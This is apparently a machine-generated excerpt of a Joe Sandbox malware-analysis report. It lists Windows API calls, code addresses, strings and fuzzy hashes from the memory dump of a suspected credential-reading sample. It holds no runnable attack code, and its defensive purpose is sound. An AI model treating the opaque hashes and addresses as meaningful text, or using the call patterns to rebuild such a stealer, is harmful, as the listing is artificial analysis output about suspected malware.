                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3015003838-0
                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 59245283-0
                                                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                      • free.MSVCRT ref: 004185AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                      • String ID:
                                                                                      • API String ID: 2802642348-0
                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                      • API String ID: 3510742995-3273207271
                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                      • String ID: 3A
                                                                                      • API String ID: 3300951397-293699754
                                                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                      • String ID: strings
                                                                                      • API String ID: 3166385802-3030018805
                                                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                      • String ID: AE$.cfg$General$EA
                                                                                      • API String ID: 776488737-1622828088
                                                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                      • String ID: sysdatetimepick32
                                                                                      • API String ID: 1028950076-4169760276
                                                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID: -journal$-wal
                                                                                      • API String ID: 438689982-2894717839
                                                                                      • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                      • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3975816621-0
                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                      APIs
                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                      • API String ID: 1214746602-2708368587
                                                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                      APIs
                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2313361498-0
                                                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                      • String ID:
                                                                                      • API String ID: 2047574939-0
                                                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                      APIs
                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                      • String ID:
                                                                                      • API String ID: 4218492932-0
                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                      APIs
                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID: gj
                                                                                      • API String ID: 438689982-4203073231
                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
